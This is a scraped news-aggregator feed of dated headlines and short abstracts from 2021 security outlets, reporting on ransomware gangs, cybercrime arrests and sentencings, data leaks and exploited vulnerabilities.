Abstract The FIN7 hacking group is attempting to join the highly profitable ransomware space by creating fake cybersecurity companies that conduct network attacks under the guise of pentesting.

BleepingComputer


October 21, 2021

Cybercrime matures as hackers are forced to work smarter Full Text

Abstract An analysis of 500 hacking incidents across a wide range of industries has revealed trends that characterize a maturity in the way hacking groups operate today.

BleepingComputer


October 21, 2021

Bulletproof hosting admins sentenced for helping cybercrime gangs Full Text

Abstract Two Eastern European men were sentenced to prison on Racketeer Influenced Corrupt Organization (RICO) charges for bulletproof hosting services used by multiple cybercrime operations to target US organizations.

BleepingComputer


October 20, 2021

Two Eastern Europeans Sentenced for Providing Bulletproof Hosting to Cyber Criminals Full Text

Abstract Two Eastern European nationals have been sentenced in the U.S. for offering "bulletproof hosting" services to cybercriminals, who used the technical infrastructure to distribute malware and attack financial institutions across the country between 2009 and 2015. Pavel Stassi, 30, of Estonia, and Aleksandr Shorodumov, 33, of Lithuania, have each been sentenced to 24 months and 48 months in prison, respectively, for their roles in the scheme. The development comes months after Stassi and Shorodumov, along with Aleksandr Grichishkin and Andrei Skvortsov of Russia, pleaded guilty to Racketeer Influenced Corrupt Organization (RICO) charges earlier this May. The U.S. Justice Department (DoJ) said the other two co-defendants, Grichishkin and Skvortsov, are pending sentencing and face a maximum penalty of 20 years in prison. Court documents showed that both the individuals worked as administrators for an unnamed bulletproof hosting service provider that rented out IP addresses,

The Hacker News


October 20, 2021

Cybercriminals Use Interactsh Tool for Vulnerability Validation Full Text

Abstract Unit 42 discovered hackers exploiting an open-source service called Interactsh; the tool generates desired domain names to help users test whether an exploit is successful. The tool allows anyone to generate specific URLs for testing on HTTP attempts and DNS queries, which help them test whet ...

Cyware Alerts - Hacker News


October 20, 2021

REvil Disappears Once Again Full Text

Abstract The Tor payment portal and data leak site of REvil was sent to oblivion after an unknown hacker using the same private keys hijacked the group’s domains. This is the second time that REvil has shut down its operations. Still, organizations should stay protected from such threats by keeping a reliab ...

Cyware Alerts - Hacker News


October 19, 2021

Feds Warn BlackMatter Ransomware Gang is Poised to Strike Full Text

Abstract An advisory by the CISA, FBI and NSA reveals hallmark tactics of and shares defense tips against the cybercriminal group that’s picked up where its predecessor DarkSide left off.

Threatpost


October 19, 2021

Analysis: Top Ransomware Gangs Targeting Healthcare Sector Full Text

Abstract Ransomware attacks are continuing to threaten the U.S. and global healthcare sectors, in part due to many entities' high dependency on legacy systems and lack of security resources, according to HC3.

Gov Info Security


October 19, 2021

LightBasin hacking group breaches 13 global telecoms in two years Full Text

Abstract A group of hackers that security researchers call LightBasin has been compromising mobile telecommunication systems across the world for the past five years.

BleepingComputer


October 19, 2021

New Karma ransomware group likely a Nemty rebrand Full Text

Abstract Threat analysts at Sentinel Labs have found evidence of the Karma ransomware being just another evolutionary step in the strain that started as JSWorm, became Nemty, then Nefilim, Fusion, Milihpen, and most recently, Gangbang.

BleepingComputer


October 18, 2021

REvil ransomware operation shuts down once again Full Text

Abstract It seems that the REvil ransomware operation has shut down once again after a threat actor has hijacked their Tor hidden service. The REvil ransomware gang has shut down its operation once again after a threat actor has hijacked their Tor leak site...

Security Affairs


October 17, 2021

REvil Ransomware Gang Goes Underground After Tor Sites Were Compromised Full Text

Abstract REvil, the notorious ransomware gang behind a string of cyberattacks in recent years, appears to have gone off the radar once again, a little over a month after the cybercrime group staged a surprise return following a two-month-long hiatus. The development, first spotted by Recorded Future's Dmitry Smilyanets, comes after a member affiliated with the REvil operation posted on the XSS hacking forum that unidentified actors had taken control of the gang's Tor payment portal and data leak website. "The server was compromised and they were looking for me. To be precise, they deleted the path to my hidden service in the torrc file and raised their own so that I would (sic) go there. I checked on others - this was not. Good luck everyone, I'm off," user 0_neday said in the post. As of writing, it isn't clear exactly who was behind the compromise of REvil's servers, although it wouldn't be entirely surprising if law enforcement agencies played a r

The Hacker News


October 15, 2021

Russian cybercrime gang targets finance firms with stealthy macros Full Text

Abstract A new phishing campaign dubbed MirrorBlast is deploying weaponized Excel documents that are extremely difficult to detect to compromise financial service organizations.

BleepingComputer


October 13, 2021

MyKings botnet operators already amassed at least $24 million Full Text

Abstract The MyKings botnet (aka Smominru or DarkCloud) is still alive and continues to spread, allowing its operators to make huge amounts of money. Avast Threat Labs researchers reported that the MyKings botnet (aka Smominru or DarkCloud) is still alive and...

Security Affairs


October 11, 2021

When criminals go corporate: Ransomware-as-a-service Full Text

Abstract In many cases, the groups work on an affiliate model, with the developers taking a cut of the ransom on top of the monthly payment, generally to the tune of around 20 to 50 percent.

The Register


October 08, 2021

Ransomware Group FIN12 Aggressively Going After Healthcare Targets Full Text

Abstract An "aggressive" financially motivated threat actor has been identified as linked to a string of RYUK ransomware attacks since October 2018, while maintaining close partnerships with TrickBot-affiliated threat actors and using a publicly available arsenal of tools such as Cobalt Strike Beacon payloads to interact with victim networks. Cybersecurity firm Mandiant attributed the intrusions to a Russian-speaking hacker group codenamed FIN12, and previously tracked as UNC1878, with a disproportionate focus on healthcare organizations with more than $300 million in revenue, among others, including education, financial, manufacturing, and technology sectors, located in North America, Europe, and the Asia Pacific. "FIN12 relies on partners to obtain initial access to victim environments," Mandiant researchers said. "Notably, instead of conducting multifaceted extortion, a tactic widely adopted by other ransomware threat actors, FIN12 appears to prioritize speed

The Hacker News


October 07, 2021

Russian-speaking hacking group scaling up ransomware attacks on hospitals Full Text

Abstract A Russian-speaking cyber criminal group is disproportionately using ransomware attacks to target hospitals and health care groups across North America as the COVID-19 pandemic continues, according to new research released Thursday. 

The Hill


October 7, 2021

FIN12 ransomware gang don’t implement double extortion to prioritize speed Full Text

Abstract Researchers detailed the activities of the FIN12 ransomware group, which earned millions of dollars over the past years. Researchers from Mandiant published a detailed report on the activities of a financially motivated ransomware group tracked as FIN12...

Security Affairs


October 5, 2021

Unnamed Ransomware gang uses a Python script to encrypt VMware ESXi servers Full Text

Abstract An unnamed ransomware gang used a custom Python script to target VMware ESXi and encrypt all the virtual machines hosted on the server. Researchers from Sophos were investigating a ransomware attack when they discovered that the attackers employed a Python...

Security Affairs


October 05, 2021

Ransomware gang encrypts VMware ESXi servers with Python script Full Text

Abstract Operators of an unknown ransomware gang are using a Python script to encrypt virtual machines hosted on VMware ESXi servers.

BleepingComputer


October 05, 2021

Ransomware Hackers Who Attacked Over 100 Companies Arrested in Ukraine Full Text

Abstract Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from the Europol's European Cybercrime Centre and the INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." B

The Hacker News


October 4, 2021

Transnational Fraud Ring Bilks U.S. Military Service Members Out of Millions Full Text

Abstract A former medical records tech stole PII that was then used to fraudulently claim DoD and VA benefits, particularly targeting disabled veterans.

Threatpost


October 04, 2021

International coalition arrests ‘prolific’ hackers involved in ransomware attacks Full Text

Abstract An international coalition of American, French, Ukrainian and European Union (EU) law enforcement authorities coordinated on the arrest last week of two individuals and the seizure of millions of dollars in profit allegedly involved with a spree of damaging ransomware attacks. 

The Hill


October 4, 2021

Ukrainian Police Arrest Hacker Who Caused $150 Million Damage to Global Firms Full Text

Abstract Ukrainian police said they had arrested a 25-year-old man who hacked more than 100 foreign companies and caused damage worth more than $150 million. The hacker used phishing attacks and hijacked software that allows computers to be accessed remotely.

Reuters


October 4, 2021

Two ransomware operators were arrested in Kyiv with EUROPOL’s support Full Text

Abstract Two ransomware operators were arrested in Kyiv, Ukraine; they are suspected of having attacked more than 100 companies, causing more than $150M in damages. A joint international law enforcement operation led to the arrest of the ransomware operators in Kyiv,...

Security Affairs


October 04, 2021

Ransomware operators behind hundreds of attacks arrested in Ukraine Full Text

Abstract Europol has announced the arrest of two men in Ukraine, said to be members of a prolific ransomware operation that extorted victims with ransom demands ranging between €5 to €70 million.

BleepingComputer


October 03, 2021

Transnational fraud ring stole millions from Army members, veterans Full Text

Abstract Fredrick Brown, a former U.S. Army contractor, was sentenced today to 151 months in prison after admitting to his role in a conspiracy that targeted thousands of U.S. servicemembers and veterans and caused millions of dollars in losses.

BleepingComputer


October 3, 2021

TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text

Abstract Proofpoint researchers reported that TA544 threat actors are behind a new Ursnif campaign that is targeting Italian organizations. Proofpoint researchers have discovered a new Ursnif banking Trojan campaign carried out by a group tracked as TA544...

Security Affairs


September 29, 2021

New Code Signing Technique isn’t that Effective, Maybe Full Text

Abstract Google researchers highlighted a new threat in the form of OpenSUpdater used by cybercriminals who are targeting people prone to downloading cracked versions of games and other popular software in the U.S. However, Microsoft thinks attackers wouldn't be infecting devices via this technique and unde ...

Cyware Alerts - Hacker News


September 27, 2021

Telegram is becoming the paradise of cyber criminals Full Text

Abstract Telegram is becoming an essential platform for cybercriminal activities; crooks use it to buy and sell any kind of stolen data and hacking tools. Many experts believe that the popular Telegram app is an efficient alternative to dark web marketplaces,...

Security Affairs


September 24, 2021

Hunting the LockBit Gang’s Exfiltration Infrastructures - Yoroi Full Text

Abstract During the last few months, the LockBit gang decided to develop and evolve a custom tool specialized in data exfiltration and used as a peculiar element to distinguish their criminal brand.

Yoroi


September 24, 2021

Karma Uses Journalists to Get Free Publicity and Pressure Victims Into Paying Ransom Full Text

Abstract The little-known ransomware group has been pursuing a novel strategy to pressure victims into paying: Get journalists to try and name the businesses they've hit, to help pressure them into paying.

Info Risk Today


September 24, 2021

Cybercriminals Sell Billions of Clubhouse and Facebook Scraped User Records on Hacker Forum Full Text

Abstract The user who posted on the hacker forum is asking $100,000 for the full database of 3.8 billion entries but is also willing to split the archive into smaller portions for potential buyers.

Security Affairs


September 24, 2021

REvil Launches Double Chats Scheme to Dupe its Affiliates Full Text

Abstract REvil ransomware gang is back in business with a different mind game as it silently robs its affiliates. Malware specialists have found that the gang is cheating on its affiliates to keep 100% of ransom payments.

Cyware Alerts - Hacker News


September 23, 2021

REvil Affiliates Confirm: Leadership Were Cheating Dirtbags Full Text

Abstract After news of REvil’s rip-off-the-affiliates backdoor & double chats, affiliates fumed, reiterating prior claims against the gang in “Hackers Court.”

Threatpost


September 23, 2021

REvil ransomware devs added a backdoor to cheat affiliates Full Text

Abstract Cybercriminals are slowly realizing that the REvil ransomware operators have been hijacking ransom negotiations, to cut affiliates out of payments.

BleepingComputer


September 22, 2021

Cring ransomware group exploits ancient ColdFusion server Full Text

Abstract In an attack recently investigated by Sophos, an unknown threat actor exploited an ancient-in-internet-years vulnerability in an 11-year-old installation of Adobe ColdFusion 9 to infect the server.

Sophos


September 21, 2021

Cring Ransomware Gang Exploits 11-Year-Old ColdFusion Bug Full Text

Abstract Unidentified threat actors breached a server running an unpatched, 11-year-old version of Adobe's ColdFusion 9 software in minutes to remotely take over control and deploy file-encrypting Cring ransomware on the target's network 79 hours after the hack. The server, which belonged to an unnamed services company, was used to collect timesheet and accounting data for payroll as well as to host a number of virtual machines, according to a report published by Sophos and shared with The Hacker News. The attacks originated from an internet address assigned to the Ukrainian ISP Green Floid. "Devices running vulnerable, outdated software are low-hanging-fruit for cyberattackers looking for an easy way into a target," Sophos principal researcher Andrew Brandt said. "The surprising thing is that this server was in active daily use. Often the most vulnerable devices are inactive or ghost machines, either forgotten about or overlooked when it comes to patching and upgra

The Hacker News


September 21, 2021

Black Matter gang demanded a $5.9M ransom to NEW Cooperative Full Text

Abstract The U.S. farmers' cooperative NEW Cooperative was hit by the Black Matter ransomware gang, which is demanding a $5.9 million ransom. BlackMatter ransomware gang hit NEW Cooperative, a farmer's feed and grain cooperative, and is demanding a $5.9 million...

Security Affairs


September 20, 2021

Europol arrested 106 fraudsters, members of a major crime ring Full Text

Abstract Europol, along with Italian and Spanish police, dismantled a major crime organization linked to the Italian Mafia that focuses on online frauds. Europol, along with law enforcement agencies in Italy and Spain, has dismantled a major crime group linked...

Security Affairs


September 20, 2021

Europol links Italian Mafia to million-dollar phishing scheme Full Text

Abstract In collaboration with Europol and Eurojust, European law enforcement dismantled an extensive network of cybercriminals linked to the Italian Mafia that was able to defraud their victims of roughly €10 million ($11.7 million) last year alone.

BleepingComputer


September 20, 2021

Europol Busts Major Crime Ring, Arrests Over 100 Online Fraudsters Full Text

Abstract Law enforcement agencies in Italy and Spain have dismantled an organized crime group linked to the Italian Mafia that was involved in online fraud, money laundering, drug trafficking, and property crime, netting the gang about €10 million ($11.7 million) in illegal proceeds in just a year. "The suspects defrauded hundreds of victims through phishing attacks and other types of online fraud such as SIM swapping and business email compromise before laundering the money through a wide network of money mules and shell companies," Europol said in a statement published today. The group operated out of Tenerife, located in Spain's Canary Islands. The development comes following a year-long sting operation that saw as many as 16 house searches, resulting in 106 arrests, mostly in Spain and Italy, and seizure of electronic devices, 224 credit cards, SIM cards, point-of-sale terminals, a marijuana plantation, and equipment used for its cultivation and distribution. 118 ban

The Hacker News


September 20, 2021

Ransomware still a primary threat as cybercriminals evolve tactics Full Text

Abstract Ransomware remained the primary threat in the first half of the year. Working with third parties to gain access to targeted networks, ransomware actors used APT tools and techniques to steal and encrypt victims' data.

Help Net Security


September 20, 2021

Shining a Light on DarkOxide: A Technical Analysis Full Text

Abstract CrowdStrike Intelligence tracked the DarkOxide threat activity cluster which launched attack campaigns against organizations within the Asia Pacific (APAC) semiconductor industry.

Crowdstrike


September 16, 2021

LockBit 2.0 Gains Free Rein After Recruiting Affiliates Full Text

Abstract LockBit is showing no signs of slowing down as the gang continues to recruit affiliates under its LockBit 2.0 RaaS model. The group's website displayed that LockBit is six times more active than its contemporaries. At this moment, organizations should start prioritizing their network security ...

Cyware Alerts - Hacker News


September 16, 2021

Microsoft: Windows MSHTML bug now exploited by ransomware gangs Full Text

Abstract Microsoft says multiple threat actors, including ransomware affiliates, are targeting the recently patched Windows MSHTML remote code execution security flaw.

BleepingComputer


September 16, 2021

Links Found Between MSHTML Zero-Day Attacks and Ransomware Operations Full Text

Abstract Microsoft and threat intelligence company RiskIQ reported finding links between the exploitation of a recently patched Windows zero-day vulnerability and known ransomware operators.

Security Week


September 15, 2021

3 Former U.S. Intelligence Officers Admit to Hacking for UAE Company Full Text

Abstract The U.S. Department of Justice (DoJ) on Tuesday disclosed it fined three intelligence community and military personnel $1.68 million in penalties for their role as cyber-mercenaries working on behalf of a U.A.E.-based cybersecurity company. The trio in question, Marc Baier, 49, Ryan Adams, 34, and Daniel Gericke, 40, are accused of "knowingly and willfully combine, conspire, confederate, and agree with each other to commit offenses," furnishing defense services to persons and entities in the country over a three year period beginning around December 2015 and continuing through November 2019, including developing invasive spyware capable of breaking into mobile devices without any action by the targets. "The defendants worked as senior managers at a United Arab Emirates (U.A.E.)-based company (U.A.E. CO) that supported and carried out computer network exploitation (CNE) operations (i.e., 'hacking') for the benefit of the U.A.E. government," the DoJ said

The Hacker News


September 15, 2021

Ransomware gang threatens to wipe decryption key if negotiator hired Full Text

Abstract The Grief ransomware gang is threatening to delete victims' decryption keys if they hire a negotiation firm, making it impossible to recover encrypted files.

BleepingComputer


September 13, 2021

BlackMatter ransomware gang hit Technology giant Olympus Full Text

Abstract Technology giant Olympus announced it was the victim of a ransomware attack and is currently investigating the extent of the incident. Olympus issued a statement to announce that its European, Middle East and Africa computer network was hit by a ransomware...

Security Affairs


September 12, 2021

Revil ransomware operators are targeting new victims Full Text

Abstract Recently we observed that part of the REvil ransomware infrastructure was up and running again, now we can confirm that they hit new victims. On September 7, the servers of the REvil ransomware gang were back online after around two months since...

Security Affairs


September 10, 2021

PYSA Ransomware Gang adds Linux Support Full Text

Abstract In August of 2021, Lacework Labs identified a Linux variant of ChaChi, a customized variant of an open-source Golang based RAT that leverages DNS tunneling for C2 communication.

Lacework


September 10, 2021

Hackers are leaking children’s data — and there’s little parents can do Full Text

Abstract In 2021, ransomware gangs published data from more than 1,200 American K-12 schools, according to a tally provided to NBC News by Brett Callow, a ransomware analyst at the cybersecurity company Emsisoft.

NBC News


September 10, 2021

Inside Genesis: The market created by cybercriminals to make millions selling your digital identity Full Text

Abstract Security researchers warn that the Genesis market, along with other criminal websites, have become an important tool for hacking organizations to carry out malicious attacks.

CBS News


September 09, 2021

Russian Ransomware Group REvil Back Online After 2-Month Hiatus Full Text

Abstract The operators behind the REvil ransomware-as-a-service (RaaS) staged a surprise return after a two-month hiatus following the widely publicized attack on technology services provider Kaseya on July 4. Two of the dark web portals, including the gang's Happy Blog data leak site and its payment/negotiation site, have resurfaced online, with the most recent victim added on July 8, five days before the sites mysteriously went off the grid on July 13. It's not immediately clear if REvil is back in the game or if they have launched new attacks. "Unfortunately, the Happy Blog is back online," Emsisoft threat researcher Brett Callow tweeted on Tuesday. The development comes a little over two months after a wide-scale supply chain ransomware attack aimed at Kaseya, which saw the Russia-based cybercrime gang encrypting approximately 60 managed service providers (MSPs) and over 1,500 downstream businesses using a zero-day vulnerability in the Kaseya VSA remote manage

The Hacker News


September 09, 2021

Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices Full Text

Abstract Network security solutions provider Fortinet confirmed that a malicious actor had unauthorizedly disclosed VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices. "These credentials were obtained from systems that remained unpatched against CVE-2018-13379 at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable," the company said in a statement on Wednesday. The disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called RAMP that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel noting that the "breach list contains raw access to the top companies" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. "2,959 out of 22,500 victims are U.S. entities," the researchers said. CVE-2018-13379 relates to a path t

The Hacker News


September 9, 2021

TeamTNT cybercrime gang expands its arsenal to target thousands of orgs worldwide Full Text

Abstract The financially motivated TeamTNT hacking group expanded its arsenal with new tools used to target thousands of victims worldwide. Researchers from AT&T Alien Labs uncovered a new campaign, tracked as Chimaera, conducted by the TeamTNT group,...

Security Affairs


September 8, 2021

Thailand: Hacker steals 40,000 patients’ data from Bangkok hospital Full Text

Abstract The personal details of more than 40,000 patients at Bhumirajanagarindra Kidney Institute Hospital have been stolen by a hacker, hospital director Thirachai Chantharotsiri said on Wednesday.

Bangkok Post


September 8, 2021

Groove gang leaks list of 500k credentials of compromised Fortinet appliances Full Text

Abstract Groove gang leaked online Fortinet credentials that could be used to breach networks of organizations using the compromised devices. The financially motivated threat actor Groove has leaked online compromised credentials belonging to many organizations....

Security Affairs


September 7, 2021

Ragnar Locker Gang Warns Victims Not to Call the FBI Full Text

Abstract Investigators/the FBI/ransomware negotiators just screw everything up, the ransomware gang said, threatening to publish files if victims look for help.

Threatpost


September 7, 2021

REvil ransomware gang’s servers are mysteriously online again Full Text

Abstract The leak site of the popular REvil ransomware gang is back online; it is not clear if the group resumed operations or the FBI turned on its servers. Today the servers of the REvil ransomware gang were back online after around two months since their shutdown....

Security Affairs


September 07, 2021

Ransomware gang threatens to leak data if victim contacts FBI, police Full Text

Abstract The Ragnar Locker ransomware group is warning that they will leak stolen data from victims that contact law enforcement authorities, like the FBI. Ragnar Locker has previously hit prominent companies with ransomware attacks, demanding millions of dollars in ransom payments.

BleepingComputer


September 7, 2021

Ragnar Locker gang threatens to leak data if victim contacts law enforcement Full Text

Abstract The Ragnar Locker ransomware operators threaten to leak stolen data if the victims attempt to contact law enforcement agencies. The Ragnar Locker ransomware gang is adopting a new technique to force victims to pay the ransom, the operators threaten...

Security Affairs


September 7, 2021

This is the perfect ransomware victim, according to cybercriminals Full Text

Abstract A new KELA report analyzed listings made by ransomware operators in the dark web, including access requests revealing that many want to break into US firms with a minimum revenue of over $100 million.

ZDNet


September 06, 2021

TrickBot gang developer arrested when trying to leave Korea Full Text

Abstract An alleged Russian developer for the notorious TrickBot malware gang was arrested in South Korea after attempting to leave the country.

BleepingComputer


September 6, 2021

Irish Gardai clamp down on cyber gang that attacked HSE Full Text

Abstract Gardaí have seized the cyberinfrastructure used by the cyber gang involved in the HSE cyber attack earlier this year. The operation is believed to have prevented more than 750 ransomware attacks, the Irish Times has reported.

IT Security Guru


September 06, 2021

Ransomware gangs target companies using these criteria Full Text

Abstract Ransomware gangs increasingly purchase access to a victim's network on dark web marketplaces and from other threat actors. Analyzing their want ads makes it possible to get an inside look at the types of companies ransomware operations are targeting for attacks.

BleepingComputer


September 3, 2021

Conti ransomware gang targets Microsoft Exchange servers with ProxyShell exploits Full Text

Abstract The Conti ransomware operators are targeting Microsoft Exchange servers leveraging recently disclosed ProxyShell vulnerability exploits. The Conti ransomware gang is targeting Microsoft Exchange servers leveraging exploits with recently disclosed...

Security Affairs


September 3, 2021

The Increasing Threat Posed by Cybercrime-as-a-Service Full Text

Abstract Researchers from Rapid7’s IntSights revealed that underground criminals are selling unauthorized access to compromised enterprise networks for up to $10,000.

Cyware Alerts - Hacker News


September 02, 2021

FBI warns of ransomware gangs targeting food, agriculture orgs Full Text

Abstract The FBI says ransomware gangs are actively targeting and disrupting the operations of organizations in the food and agriculture sector, causing financial loss and directly affecting the food supply chain.

BleepingComputer


September 01, 2021

Cybercriminals Abusing Internet-Sharing Services to Monetize Malware Campaigns Full Text

Abstract Threat actors are capitalizing on the growing popularity of proxyware platforms like Honeygain and Nanowire to monetize their own malware campaigns, once again illustrating how attackers are quick to repurpose and weaponize legitimate platforms to their advantage. "Malware is currently leveraging these platforms to monetize the internet bandwidth of victims, similar to how malicious cryptocurrency mining attempts to monetize the CPU cycles of infected systems," researchers from Cisco Talos said in a Tuesday analysis. "In many cases, these applications are featured in multi-stage, multi-payload malware attacks that provide adversaries with multiple monetization methods." Proxyware, also called internet-sharing applications, are legitimate services that allow users to carve out a percentage of their internet bandwidth for other devices, often for a fee, through a client application offered by the provider, enabling other customers to access the internet using

The Hacker News


September 1, 2021

Ransomware Gangs Using Data Leak Sites to Recruit New Affiliates Full Text

Abstract Ransomware gangs are posting announcements on their own data leaks websites. This shift has come about in large part because two major ransomware forums banned gangs from promoting their RaaS schemes.

Security Intelligence


September 01, 2021

LockBit gang leaks Bangkok Airways data, hits Accenture customers Full Text

Abstract Bangkok Airways, a major airline company in Thailand, confirmed it was the victim of a cyberattack earlier this month that compromised personal data of passengers.

BleepingComputer


September 1, 2021

Cybercriminals Abuse the Domain Name System Through Malicious Websites to Exploit Private Networks Full Text

Abstract Allowing arbitrary cross-origin requests is known to be extremely dangerous. Therefore most modern browsers block these requests. However, DNS rebinding provides a way to bypass this restriction.

Palo Alto Networks


September 1, 2021

LockBit ransomware operators leak 200GB of data belonging to Bangkok Airways Full Text

Abstract LockBit ransomware operators have breached Bangkok Airways; the airline confirmed it was the victim and disclosed a data breach impacting its passengers. Bangkok Airways, a regional airline based in Bangkok, discloses a data breach...

Security Affairs


August 31, 2021

Cybercriminal sells tool to hide malware in AMD, NVIDIA GPUs Full Text

Abstract Cybercriminals are making strides towards attacks with malware that executes code from the graphics processing unit (GPU) of a compromised system.

BleepingComputer


August 31, 2021

Cybercriminals buy up admin credentials to sharpen attacks on cloud deployments Full Text

Abstract One of the most interesting trends over the past few months, according to a new report, is the rising demand for access to cloud accounts in the sale of admin credentials from Initial Access Brokers.

Tech Republic


August 30, 2021

Ragnarok Quits, Universal Decryption Keys Out Full Text

Abstract The operators of Ragnarok ransomware have called it quits and released decryption keys in a recent announcement. Active since 2019, the group had claimed several victims globally. Ragnarok's sudden disappearance doesn't look like a planned one. A universal decryptor for Ragnarok ransomware has been ...

Cyware Alerts - Hacker News


August 30, 2021

Cybercriminals Steal $29 Million in Crypto Assets from Decentralized Finance Platform Cream Finance Full Text

Abstract Hackers are estimated to have stolen more than $29 million in cryptocurrency assets from Cream Finance, a DeFi platform that allows users to loan and speculate on cryptocurrency price variations.

The Record


August 30, 2021

Deciphering ShinyHunters’ Data Breach Tactics Full Text

Abstract The gang has claimed responsibility for a string of data breaches involving Pixlr, ChqBook, Tokopedia, BigBasket, Microsoft’s GitHub account, and MeetMindful among others.

Cyware Alerts - Hacker News


August 27, 2021

Belgian Police Warns of Cybercriminals Impersonating Europol’s Executive Director to Steal Payment Credentials Full Text

Abstract Scammers are impersonating the head of Europol, the European Union’s law enforcement agency, in an attempt to spook victims into handing over their financial information.

Cyberscoop


August 25, 2021

FIN8 group used a previously undetected Sardonic backdoor in a recent attack Full Text

Abstract Financially motivated threat actor FIN8 employed a previously undocumented backdoor, tracked as 'Sardonic,' in recent attacks. The financially motivated threat actor FIN8 has been observed employing a previously undetected backdoor, dubbed Sardonic,...

Security Affairs


August 25, 2021

ShinyHunters group claims to have data of 70M AT&T customers Full Text

Abstract Threat actors claim to have a database containing private information on roughly 70 million AT&T customers, but the company denies any security breach. ShinyHunters group claims to have a database containing private information on roughly 70 million...

Security Affairs


August 25, 2021

FIN8 cybercrime gang backdoors US orgs with new Sardonic malware Full Text

Abstract A financially motivated cybercrime gang has breached and backdoored the network of a US financial organization with new malware dubbed Sardonic by the Bitdefender researchers who first spotted it.

BleepingComputer


August 24, 2021

Researchers Warn of 4 Emerging Ransomware Groups That Can Cause Havoc Full Text

Abstract Cybersecurity researchers on Tuesday took the wraps off four up-and-coming ransomware groups that could pose a serious threat to enterprises and critical infrastructure, as the ripple effect of a recent spurt in ransomware incidents shows that attackers are growing more sophisticated and more profitable in extracting payouts from victims. "While the ransomware crisis appears poised to get worse before it gets better, the cast of cybercrime groups that cause the most damage is constantly changing," Palo Alto Networks' Unit 42 threat intelligence team said in a report shared with The Hacker News. "Groups sometimes go quiet when they've achieved so much notoriety that they become a priority for law enforcement. Others reboot their operations to make them more lucrative by revising their tactics, techniques and procedures, updating their software and launching marketing campaigns to recruit new affiliates." The development comes as ransomware attacks are g

The Hacker News


August 24, 2021

Ransomware gang’s script shows exactly the files they’re after Full Text

Abstract A PowerShell script used by the Pysa ransomware operation gives us a sneak peek at the types of data they attempt to steal during a cyberattack.

BleepingComputer


August 23, 2021

FBI: OnePercent Group Ransomware targeted US orgs since Nov 2020 Full Text

Abstract The Federal Bureau of Investigation (FBI) has shared info about a threat actor known as OnePercent Group that has been actively targeting US organizations in ransomware attacks since at least November 2020.

BleepingComputer


August 23, 2021

Researchers Detail Modus Operandi of ShinyHunters Cyber Crime Group Full Text

Abstract ShinyHunters, a notorious cybercriminal underground group that's been on a data breach spree since last year, has been observed searching companies' GitHub repository source code for vulnerabilities that can be abused to stage larger scale attacks, an analysis of the hackers' modus operandi has revealed. "Primarily operating on Raid Forums, the collective's moniker and motivation can partly be derived from their avatar on social media and other forums: a shiny Umbreon Pokémon," Intel 471 researchers said in a report shared with The Hacker News. "As Pokémon players hunt and collect 'shiny' characters in the game, ShinyHunters collects and resells user data." The revelation comes as the average cost of a data breach rose from $3.86 million to $4.24 million, making it the highest average cost in 17 years, with compromised credentials responsible for 20% of the breaches reported by over 500 organizations. Since rising to prominence in A

The Hacker News


August 21, 2021

New LockFile ransomware gang uses ProxyShell and PetitPotam exploits Full Text

Abstract A new ransomware gang named LockFile targets Microsoft Exchange servers exploiting the recently disclosed ProxyShell vulnerabilities. A new ransomware gang named LockFile targets Microsoft Exchange servers using the recently disclosed ProxyShell...

Security Affairs


August 21, 2021

New analysis of Diavol ransomware reinforces the link to TrickBot gang Full Text

Abstract In July, researchers from Fortinet reported that a new ransomware family, tracked as Diavol, might have been developed by Wizard Spider, the cybercrime gang behind the TrickBot botnet.

Cyber Defense Magazine


August 20, 2021

Cybercrime Group Asking Insiders for Help in Planting Ransomware Full Text

Abstract A Nigerian threat actor has been observed attempting to recruit employees by offering to pay them $1 million in bitcoin to deploy Black Kingdom ransomware on companies' networks as part of an insider threat scheme. "The sender tells the employee that if they're able to deploy ransomware on a company computer or Windows server, then they would be paid $1 million in bitcoin, or 40% of the presumed $2.5 million ransom," Abnormal Security said in a report published Thursday. "The employee is told they can launch the ransomware physically or remotely. The sender provided two methods to contact them if the employee is interested: an Outlook email account and a Telegram username." Black Kingdom, also known as DemonWare and DEMON, attracted attention earlier this March when threat actors were found exploiting ProxyLogon flaws impacting Microsoft Exchange Servers to infect unpatched systems with the ransomware strain. Abnormal Security, which detected and bl

The Hacker News


August 19, 2021

Researchers Find New Evidence Linking Diavol Ransomware to TrickBot Gang Full Text

Abstract Cybersecurity researchers have disclosed details about an early development version of a nascent ransomware strain called Diavol that has been linked to threat actors behind the infamous TrickBot syndicate. The latest findings from IBM X-Force show that the ransomware sample shares similarities with other malware that has been attributed to the cybercrime gang, thus establishing a clearer connection between the two. In early July, Fortinet revealed specifics of an unsuccessful ransomware attack involving a Diavol payload targeting one of its customers, highlighting the payload's source code overlaps with that of Conti and its technique of reusing some language from the Egregor ransom note. "As part of a rather unique encryption procedure, Diavol operates using user-mode Asynchronous Procedure Calls (APCs) without a symmetric encryption algorithm," Fortinet researchers previously said. "Usually, ransomware authors aim to complete the encryption oper

The Hacker News


August 19, 2021

Threat actors stole $97 million from Liquid cryptocurrency exchange Full Text

Abstract Japanese cryptocurrency exchange Liquid was hit by a cyber attack in which threat actors stole $97 million worth of cryptocurrency assets from the company. Japan-based cryptocurrency exchange Liquid was hit by a cyber attack that resulted in the theft of $97 million...

Security Affairs


August 19, 2021

Indra Group Associated with Attacks on Iran Full Text

Abstract Check Point Research said the Indra APT group was behind the recent cyberattack that crippled Iran's transport ministry and national train system. Attackers disseminated three different wipers, Meteor, Stardust, and Comet, into the victim's network. Even though the group has not ...

Cyware Alerts - Hacker News


August 18, 2021

New analysis of Diavol ransomware reinforces the link to TrickBot gang Full Text

